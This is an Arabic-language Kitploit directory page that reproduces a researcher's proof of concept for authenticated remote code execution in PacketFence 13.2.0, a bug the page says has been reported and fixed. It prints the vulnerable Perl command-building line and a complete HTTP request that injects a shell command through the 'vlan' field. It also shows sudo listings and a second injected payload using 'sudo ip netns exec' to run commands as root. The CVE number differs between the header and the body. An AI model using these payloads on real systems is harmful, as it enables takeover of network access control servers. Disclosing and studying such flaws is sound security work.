Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
packetfence-CVE-2024-39024 — في Packetfence 13.2.0، يسمح إعداد واجهة WebGui بتنفيذ تعليمات برمجية عن بُعد بعد المصادقة. | Kitploit
أدوات/GitHubGitHub/ly1g3/packetfence-cve-2024-39024
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubly1g3/packetfence-cve-2024-39024

packetfence-CVE-2024-39024

في Packetfence 13.2.0، يسمح إعداد واجهة WebGui بتنفيذ تعليمات برمجية عن بُعد بعد المصادقة.

عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

حول

باحث أمني: ly1g3، ly1g3[at]tuta.io

بصمة GPG: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

نظرة عامة: تنفيذ تعليمات برمجية عن بعد - من مستخدم مصادق بمستوى منخفض إلى مسؤول RCE

CVE: CVE-2024-3924

الجدول الزمني:

  • تم الاكتشاف - ly1g3
  • تم الإبلاغ - ly1g3
  • تم الإصلاح - packetfence

المرجع: https://www.packetfence.com/news/2024/packetfence-14-0-released/

Packetfence تنفيذ تعليمات برمجية عن بعد مصادق عليه

في Packetfence 13.2.0، يسمح إعداد واجهة WebGui بتنفيذ تعليمات برمجية عن بعد للمستخدمين المصادق عليهم.

تقني

من مسؤول مصادق إلى شل الجذر

مسؤول -> تكوين -> تكوين الشبكة -> الواجهات

Interface.pm: الدالة create السطر 64 المتغير $vlan_id يأتي من إدخال المستخدم ويتم التحقق منه فقط من جانب العميل

root@kitploit:~
    my $cmd = "sudo ip link add link $physical_interface name $physical_interface.$vlan_id type vlan id $vlan_id";
    eval { $status = pf_run($cmd) };

إثبات المفهوم (POC)

burp:

root@kitploit:~
POST /api/v1/config/interfaces HTTP/1.1
Host: 192.168.100.174:1443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Authorization: Bearer AAAAA
Content-Type: application/json
X-Packetfence-Tenant-Id: 1
Content-Length: 494
Origin: https://192.168.100.174:1443
Referer: https://192.168.100.174:1443/admin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Dnt: 1
Sec-Gpc: 1
Te: trailers
Connection: close

{"id":"eth0","prefixRouteName":"","type":"none","additional_listening_daemons":[],"address":"10.0.0.1/24","coa":null,"dhcpd_enabled":null,"dns":null,"high_availability":0,"hwaddr":"AA:AA:AA:AA:AA:64","ifindex":"3","ipaddress":"10.0.0.1","ipv6_address":null,"ipv6_prefix":null,"master":"eth0","name":"eth0","nat_enabled":null,"netmask":"255.255.255.0","network":"10.0.0.0","networks":[],"reg_network":null,"split_network":null,"tenant_id":1,"vip":null,"vlan":"$(echo 'win'>> /tmp/perl_log.txt)"}

تصعيد الامتيازات:

gtfobins

root@kitploit:~
$ sudo -l
Matching Defaults entries for pf on packetfence:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    !requiretty

Runas and Command-specific defaults for pf:
    Defaults!/sbin/ip netns exec * !syslog

User pf may run the following commands on packetfence:
    (root) NOPASSWD: /bin/systemctl, /sbin/iptables, /usr/sbin/ip6tables, /usr/sbin/ipset, /sbin/ipset, /sbin/ip,
        /sbin/vconfig, /sbin/route, /usr/bin/systemctl, /usr/bin/tee, /usr/local/pf/sbin/pfdhcplistener, /bin/kill,
        /usr/sbin/freeradius, /usr/sbin/chroot, /usr/local/pf/bin/pfcmd, /usr/sbin/conntrack, /usr/bin/timedatectl,
        /usr/bin/hostnamectl

root@kitploit:~
"vlan":";sudo /usr/sbin/ip netns exec foo id >> /tmp/perl_log.txt ;",
تنزيل الأداة